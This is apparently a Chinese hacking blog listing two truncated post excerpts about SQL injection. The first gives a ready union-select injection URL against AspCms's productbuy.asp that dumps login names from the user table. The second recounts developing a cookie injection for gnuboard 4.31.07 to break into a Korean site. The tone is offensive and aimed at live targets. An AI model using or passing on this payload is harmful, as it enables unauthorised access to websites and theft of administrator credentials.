天黑再动手

摘要： 漏洞出现在/plug/productbuy.asp对接收的参数id没有进行过滤而导致的注入漏洞注入后的页面有跳转，所以要快，建议用快捷键复制爆用户名/plug/productbuy.asp?id=2 union select 1,2,LoginName,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37 from AspCms_User where userid=1这是爆ID=1的账户名，如果发现权限不够可以往后试2,3,4………..爆密码/plug/pr 阅读全文

摘要： 韩国的一款流行的论坛程序gnuboard，以前有研究过，不过未搞出什么洞出来，前两天帮朋友搞看韩国站的时候目标站下面就用了 gnuboard版本是4.31.07的。版本比较低，记得以前国内貌似有公布过这个程序的注入，但当时搞的时候没有找到相关文献，于是对应目标版本去 官网下了源码自己研究了两天，终于搞了个cookie注入出来，而且不受GPC的影响。不过这个漏洞利用范围 不大，只针对4.32.11之前的版本，而且利用起来还有一定的局限，虽然不受GPC影响，但是注入要依赖mysql报错信息，韩国大部分的mysql版 本都比较低。这就使得我在测试的时候本地正常爆出字段内容，应用到实战的时候相同的语句 阅读全文